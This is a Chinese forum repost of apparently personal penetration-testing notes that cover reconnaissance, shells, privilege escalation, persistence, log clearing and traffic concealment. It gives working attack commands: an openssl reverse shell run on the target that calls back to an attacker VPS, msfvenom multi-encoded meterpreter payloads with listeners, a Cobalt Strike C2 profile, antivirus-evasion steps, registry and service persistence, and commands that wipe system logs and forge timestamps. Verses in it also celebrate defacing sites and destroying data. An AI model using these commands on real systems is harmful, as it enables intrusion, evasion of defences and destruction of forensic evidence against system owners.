0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

个人渗透技巧汇总(避坑)笔记

jf_Fo0qk3ln 来源:菜鸟学信安 2023-03-30 09:35 次阅读

前言

首先我们拿到一个站不能心急,凡事三思而行 跑得太快是会滑倒的当我们获得目标的时候不要急着用扫描器,这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录,什么站能扫什么站不能扫,心里一定要有点b数,不然可能等待的就是不一样的结果了。如果手工测试无果后再用代理手法扫描网站,必要的时候设置二级代理。当然!!!!什么站能扫什么站不能扫,心里一定要有点数!小提示:在使用proxychains的时候,程序或者终端选项尽量不要设置任何协议的代理,否则可能会打乱这个代理回路出现网络错误。54fae188-ce97-11ed-bfe3-dac502259ad0.png

浅蓝的渗透测试导图以及小工具

一个导图,可以做一个大致的方向参考,跟着方向逐一测试,期间也可以巩固基础。https://github.com/iSafeBlue/Mind-Map/releases550b9b68-ce97-11ed-bfe3-dac502259ad0.png这里再附一个渗透工具包,帮助新手熟悉渗透测试:https://github.com/lz520520/railgunAWVS + Nessus docker
# 拉取镜像
  docker pull leishianquan/awvs-nessus:v1
  # 启动
  docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
  # 查看容器
  docker ps –a
  # 启动容器
  docker start container-id
  # 进入容器
  docker exec –it container-id /bin/bash
  
  # 进入容器后,启动nessus
  /etc/init.d/nessusd start
  
  # 访问扫描器地址和账号密码
  Nessus:
  https://127.0.0.1:8834/#/
  account:leishi/leishianquan


  Awvs13:
  https://127.0.0.1:13443/
  account:admin@admin.com/Admin123

ZERO

首先进行信息收集你获得的信息越多对自己后面的渗透就越有帮助,whois,旁站子域,服务器操作系统版本,web中间件以及waf与cdn,通过google与github看看是否存在已知的漏洞这样有助于快速的获得权限,端口扫描并判断服务漏洞加以利用,目录的fuzz,弱口令的fuzz,google hack 进一步探测网站的信息后台以及敏感信息,撒旦天眼也是不错的信息工具。

一.时刻关注返回的数据包

漏洞有很多种类型都需要渗透方认证仔细的对每个数据包已经url进行验证,要相信所有的努力都是为成功而付出的。如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等
  1. 验证码与邮箱以及token的返回泄露,以及后台为校验从而可删除的参数
    截获的敏感数据参数,学会在多个数据包反复尝试。
    从某个成功请求中捕获数据包观察cookie或者token是否存在规律或加密。
    通过修改返回的状态值,触发js进行逻辑漏洞的渗透。
    token的key参数解密构建获取真实user密钥,可拼接、规律、时间戳……
下面是网络上的渗透三字诀
进谷歌  找注入
没注入  就旁注
没旁注  用0day
0day  猜目录
没目录  就嗅探
爆账户  找后台
传小马  放大马
拿权限  挂页面
放暗链  清数据
渗透企业实战版
搞企业  先扫描
扫描器  商业好
默密码  都知道
社工库  找一找
邮箱号  先列好
九头蛇  跑一跑
搞不定  放大招
找插件  挖一挖
发邮件  凭伪造
没邮箱  搞网站
二级域  皆可爆
老漏洞  没修好
新漏洞  刷一票
干研发  Git 找
源代码  全都要
C D N  可以跳
防火墙  可以撬
堡垒机  可以秒
云防护  可以秒
是企业  没有哪家搞不了!
二.FUZZ的艺术https://www.freebuf.com/vuls/221129.html

三.WEBBYPASS

linux反弹 shell:
1)VPS 上生成 ssl 证书的公钥/私钥对:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
2)VPS 监听反弹 shell:
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
3)目标上回连 shell:
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect :1024 > /tmp/s; rm /tmp/s


VPS 上已获取加密的 getshell 了。
winodws桌面:TeamViewerQS单文件windows下载文件;certutil -urlcache -split -fhttps://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.pytest.py脚本反弹内网:reGeorghttps://github.com/sensepost/reGeorg1.将 tunnel脚本(aspx | ashx | jsp | php)上传到Web服务器,访问显示“Georg says, ‘All seems fine’“,表示脚本运行正常。2.在攻击者机器上,启动reGeorgSocksProxy.py,监听9999端口,看到 Checking if Georg is ready,确认正常运行,这个时候就可以吧目标机作为跳板了。waf:中国蚁剑客户端,冰蝎与内存马,反复尝试使用编码字节绕过

四.提权与权限维持

首先通过检查目标服务器的进程与可利用服务以及漏洞ssl加密payload
###生成证书并写入文件
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt


cat  rsaprivate.key servercertificate.crt >my.pem
###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "x00x0ax0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw


###监听
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
老牌工具Cobaltstrike+Profiles
上云和隐藏流量参考free教程https://www.freebuf.com/articles/network/262445.html1.利用keytool生成自己的免费证书(可在kali上生成)
keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
2.C2.profile文件编辑
set sample_name "tryblog POS Malware";
 
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "10";    # throw in a 10% jitter
 
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
 
#设置证书,注意以下内容得和你之前生成的证书一样
https-certificate {
    set CN       "TRY"; 
    set O        "TRY";   
    set C        "TRY";
    set L        "TRY";
    set OU       "TRY";  
    set ST       "TRY";
    set validity "365";
}
#设置,修改成你的证书名称和证书密码
code-signer{
    set keystore "tryblog.store";
    set password "tryblog";
    set alias "tryblog";
}
 
#指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";
 
#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";
 
#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns    "235";
 
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
 
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urltrytryd";
 
        id {
            netbios;
            parameter "id";
        }
 
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
 
    server {
        output {
            print;
        }
    }
}
 
http-get {
    set uri "/updates";
 
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
 
    server {
        header "Content-Type" "text/plain";
 
        output {
            base64;
            print;
        }
    }
}
3.验证c2lint,启动服务端,载入汉化运行
./c2lint C2.profile
./teamserver ip:prot ./C2.profile 
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC  -jar cobaltstrike.jar
免杀远控整理(来自Tide团队)
551a9e10-ce97-11ed-bfe3-dac502259ad0.jpg 项目地址:https://github.com/QChiLan/BypassAntiVirus
windows下的免杀生成(顺序从上到下依次混淆)
如果需要捆绑正常软件运行使用shellter,如不能过免杀,再分步测试以下操作。cs文件编码混淆用AVIATOR生成。测试可以再用python再当前目录打开一个web服务器:
python3 -m http.server 8080
1.Lime-Crypter 注入线程2.DeepSeaOBFuscator 封装3.CryptoObfuscator 混淆4.https 证书修改5.base64prionx 混淆6.themida 加壳7.https 证书修改8.viper(在线msf处理平台可加特征和签名很方便)*通用免杀法(简单概括就是1.修改特征码2.花指令免杀3.加壳免杀。552adaaa-ce97-11ed-bfe3-dac502259ad0.png也可以通过把软件分块用杀软重复扫描找到特征码进行修改,当然也可以通过加载器的形式更加靠谱但是需要落地多个文件,c#文件自己封装推荐avator+掩盖日可以过火绒
Veil
Veil是一种免杀生成工具,用于生成绕过常见防病毒解决方案的metasploit有效负载。
一些payload加料的技巧
1、通过ssl与加壳加密palyoad(免杀)2、通过dns或套cdn传输:https://mp.weixin.qq.com/s/fdGnJxDjh1Orb2V76EX8tQ
windows
Exploit批量扫描:Windows-Exploit-Suggester漏洞模块:https://github.com/SecWiki/windows-kernel-exploitsBITS免杀提权:https://github.com/ohpe/juicy-potato
linux
搜寻配置文件中的明文密码、sudo滥用Exploit批量扫描:linux-exploit-suggester、linux-exploit-suggester-2漏洞模块:https://github.com/SecWiki/linux-kernel-exploits

五、日志清理(细心的安全工程师会更改位置并定时备份后渗透主要还是靠细心)

windows
遇见不能删除的先停止相关服务:net stop “task scheduler”系统日志推荐使用工具:clearlog.exemsf清理:clearev ,run event_manager -c
防火墙日志路径:%systemroot%system32logfiles
IIS日志路径:%systemroot%system32logfles
windows系统日志:%systemroot%system32config
Scheduler服务日志:%systemroot%schedlgu.txt
日志在注册表的键:HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
系统日志:%SystemRoot%System32WinevtLogsSystem.evtx
安全日志:%SystemRoot%System32WinevtLogsSecurity.evtx
应用程序日志:%SystemRoot%System32WinevtLogsApplication.evtx
linux(检索根目录以及上级目录是否存在备份)
1.清空当前用户历史命令并删除相关文件:
history -c
echo “”> /root/.bash_history
echo “”> /var/run/utmp
2.清除部分日志:echo “”> /var/log/secure;全删除如不能删除使用echo依次覆盖:rm -f -r /var/log/*;
/var/log/boot.log:录了系统在引导过程中发生的事件,就是Linux系统开机自检过程显示的信息


/var/log/lastlog :记录最后一次用户成功登陆的时间、登陆IP等信息


/var/log/messages :记录Linux操作系统常见的系统和服务错误信息


/var/log/secure :Linux系统安全日志,记录用户和工作组变坏情况、用户登陆认证情况


/var/log/btmp :记录Linux登陆失败的用户、时间以及远程IP地址


/var/log/syslog:只记录警告信息,常常是系统出问题的信息,使用lastlog查看


/var/log/wtmp:该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件,使用last命令查看


/var/log/maillog 与邮件相关的日志信息


/var/log/cron 与定时任务相关的日志信息


/var/log/spooler 与UUCP和news设备相关的日志信息


/var/log/auth.log 系统授权信息,包括用户登录和使用的权限机制等 (debian)


/var/run/utmp:该日志文件记录有关当前登录的每个用户的信息。如 who、w、users、finger等就需要访问这个文件
3.更新test.txt的时间和test2.txt时间戳相同:touch -r test.txt test2.txt;设定时间戳:touch -t 201605171210.20 test.txt
web容器路径
数据库通过查询配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml)winodws
apcheC:Program FilesApache Software FoundationApache2.2htdocs"
tomact:CProgram Filestomcatlog
nignx: CProgram Filesnginx-1.14.2logs
linux
tomcat:/usr/local/tomcat/logs/
apche:/usr/local/apache/logs/access_log
nignx:/var/log/httpd/error_log  rm -f -r /var/log/*
七、后渗透与流量隐匿
frsocks+protoplex+流量重定向实现端口复用
protoplex是一个协议复用的工具,比如以下命令可将本地9999端口的流量根据协议类型转到本地的2333和80端口。用于绕过云主机的nsg安全规则。
./frsocks -sockstype fsocks -listen 2333  //创建本地监听
./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999  //端口分流,根据协议类型转到本地的2333和80端口
重定向命令linux:
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
netsh interface portproxy show all //查看转发规则
netsh interface portproxy reset   //清除所有转发规则
将 IP 流量封装进 IMCP 的 ping 数据包进行传输
工具如下1、icmptunnelhttps://github.com/jamesbarlow/icmptunnel2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/3、icmpsh:https://github.com/inquisb/icmpsh4、Powershell-ICMPhttps://github.com/api0cradle/Powershell-ICMP5、复杂的网络环境可以使用EarchWorm(ew)实现多级代理访问目标主机
后渗透
ps:合理利用后渗透插件可以剩下很多时间,但是要注意痕迹清理。插件有谢公子和梼杌完整版比较常用,Cobaltstrike推荐插件:谢公子、梼杌、Z1-AggressorScripts、ladong5536471e-ce97-11ed-bfe3-dac502259ad0.png详情参考这个https://blog.csdn.net/qq_33020901/article/details/98357659添加开机自启
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /f 


reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
sc create "server power" binpath= "C:WindowsSystem32config.exe"
//设置服务的描述字符串
sc description "server power" "description" 
//设置这个服务为自动启动
sc config "server power" start= auto 
net start "server power" 启动服务

八、 一个便捷的HACK浏览器(上火狐开发者版本也不错)

这里个人做一个备份有需求的自行google,解释一下英文的插件功能。5542bc74-ce97-11ed-bfe3-dac502259ad0.png555257d8-ce97-11ed-bfe3-dac502259ad0.png5564710c-ce97-11ed-bfe3-dac502259ad0.pngAjax Interceptor:可以自定义ajax的json返回值,前端测试用。Anti-HoneyPot:红队用,可以检查网页中的蜜罐链接并提示。ApiRequest.io Ajax Capture Debugging Tool:这个是神器!!强推,可以测试网页中任何的ajax请求包括跨站ajax请求重放,官网提供了只30天的请求历史记录记得保存重要请求。Decentraleyes:可以拦截一些cdn和本地的文件跟踪器APK Downloader for Google Play Store :免google框架在线下载应用商店的app。Buster Captcha Solver for Humans:过goole验证码,有时候识别会比较慢。Easy WebRTC Block:干掉webrtc的ip回显,避免泄露真实ipIP Whois & Flags Chrome & Websites Rating:自动在后台测试当前网站ip的归属地然后以小图标的形式返回给前台非常便捷,点击进去还可以看到cdn以及whois信息。NoScript: 慎用,此插件可以强力的拦截网页上的追踪器来保护用户的隐私与真实信息,但是会造成许多网站打开异常。Identify web technologies :可以帮你分析当前网站所使用的网络技术与框架。Shodan:网络搜索引擎同fofa与钟馗之眼,互联网设备大杀器Picture-in-Picture Extension:画中画悬浮窗口看视频SourceDetector:可以再后台默默的扫描是否有源代码泄露HackTools:方便懒人使用点击扩展可快速复制sql,xss,反弹shell。

	

审核编辑 :李倩


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 互联网
    +关注

    关注

    54

    文章

    11080

    浏览量

    102656
  • 操作系统
    +关注

    关注

    37

    文章

    6707

    浏览量

    123160
  • 渗透
    +关注

    关注

    0

    文章

    19

    浏览量

    6269

原文标题:干货|个人渗透技巧汇总(避坑)笔记

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    R128点屏踩笔记

    本文所整理的R128点屏踩笔记均是在参考以下应用开发案例进行屏幕适配时遇到的实际开发问题,涵盖了屏幕花屏、屏幕白屏、LVGL显示颜色错误等常见问题的解决方法。
    的头像 发表于 12-03 10:17 1212次阅读
    R128点屏踩<b class='flag-5'>坑</b><b class='flag-5'>笔记</b>

    基于STM32的USB程序开发笔记 汇总

    忙了一下午终于有时间整理了,基于STM32的USB程序开发笔记汇总,需要的亲们点击链接阅读哈!{:4_95:}基于STM32的USB程序开发笔记(一)https://bbs.elecfans.com
    发表于 03-20 16:08

    个人的学习资料汇总

    本帖最后由 nyjingle 于 2020-8-11 10:09 编辑 【个人的学习资料汇总贴】MYMINIEYE:60天FPGA工程师入门就业项目实战特训营(视频+开发板)http
    发表于 08-07 11:16

    STM32基础知识入门指南

    一STM32入门踩笔记——(2)无敌的我、又回来了。。。。又是元气满满的一天、又是踩崩溃的一天。昨晚上连夜把跑马灯寄存器版本搞定了。这里需要声明一下。哈哈、首先说我不是水军或者托儿哈!!我
    发表于 08-03 07:30

    安装VSCODE个人笔记

    个人笔记安装VSCODE。安装CYGWIN以及里面的一套东西。安装OPENOCD。安装STM32CUBE以及一套库的下载。帮助: CYGWIN
    发表于 08-24 07:40

    分享一些嵌入式系统编程中内存操作相关的指南

    在嵌入式系统的编程中,内存操作是我们常用到的,但往往也是易错的地方,怎么避免呢,今天给大家分享一些相关的指南。数据指针...
    发表于 12-17 07:18

    STM32+CubeMX开发工程笔记汇总,错过绝对后悔

    STM32+CubeMX开发工程笔记汇总,错过绝对后悔
    发表于 12-21 06:00

    设计干货:PCB板漏孔、漏槽在设计端如何

    ,产品无法使用。请看下图;如何:PCB设计文件各层都有各层的作用,钻孔、槽孔必须放置在钻孔层,不能认为设计有就能制造。问题2:Altium设计的文件过孔0 D码;问题描述:漏过孔开路,不导电。原因分析
    发表于 09-23 10:52

    PCB板漏孔、漏槽怎么办?看工程师“SOP”

    。理论上此操作没有多大问题,但是在制造过程中打孔只是用钻孔层,因此容易忽略其他层存在槽孔,导致此槽孔漏做打孔,产品无法使用。请看下图。如何:PCB设计文件各层都有各层的作用,钻孔、槽孔必须放置在
    发表于 03-01 10:36

    机器学习的个人学习笔记

    本文档的主要内容详细介绍的是机器学习的个人学习笔记免费下载。
    发表于 03-01 09:28 22次下载
    机器学习的<b class='flag-5'>个人</b>学习<b class='flag-5'>笔记</b>

    基于STC89C52的智能小车——红外障+PWM调速篇

    这篇学习笔记虽然看起来很水,毕竟红外障和PWM在之前的学习笔记里都写过了,但这次确实是我耗时最久的一次作业。用软件实现PWM真是一个深渊巨
    发表于 11-23 17:21 15次下载
    基于STC89C52的智能小车——红外<b class='flag-5'>避</b>障+PWM调速篇

    PCB设计指南

    本文就重点讲解PCB设计指南,99%的PCB工程师容易忽略的!点进来 大家在PCB设计中都踩过哪些
    的头像 发表于 03-20 18:20 1128次阅读
    PCB设计<b class='flag-5'>避</b><b class='flag-5'>坑</b>指南

    个人渗透技巧汇总

    前言 首先我们拿到一个站不能心急,凡事三思而行 跑得太快是会滑倒的 当我们获得目标的时候不要急着用扫描器,这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录,什么站能扫什么站不能扫,心里一定要有点b数,不然可能等待的就是不一样的结果了。 如果手工测试无果后再用代理手法扫描网站,必要的时候设置二级代理。 当然!!!!什么站能扫什么站不能扫,心里一定要有点数! 小提示:在使用proxychains的时候,程序或者
    的头像 发表于 05-26 15:13 586次阅读
    <b class='flag-5'>个人</b><b class='flag-5'>渗透</b>技巧<b class='flag-5'>汇总</b>

    【6月28日|直播】遇见KeysightCare——贵重仪器安全指南

    现场直播时间: 2023年6月28日 下午1415   立即报名 01 直播简介 什么?!价值百万的仪器坏了?怎么就坏了呢?如果你有这样的困惑,快来参加直播,听听专家详细介绍如何“”,保证高端
    的头像 发表于 06-14 07:40 449次阅读
    【6月28日|直播】遇见KeysightCare——贵重仪器安全<b class='flag-5'>避</b><b class='flag-5'>坑</b>指南

    指南】电容耐压降额裕量不合理导致电容频繁被击穿

    指南】电容耐压降额裕量不合理导致电容频繁被击穿
    的头像 发表于 11-23 09:04 1699次阅读
    【<b class='flag-5'>避</b><b class='flag-5'>坑</b>指南】电容耐压降额裕量不合理导致电容频繁被击穿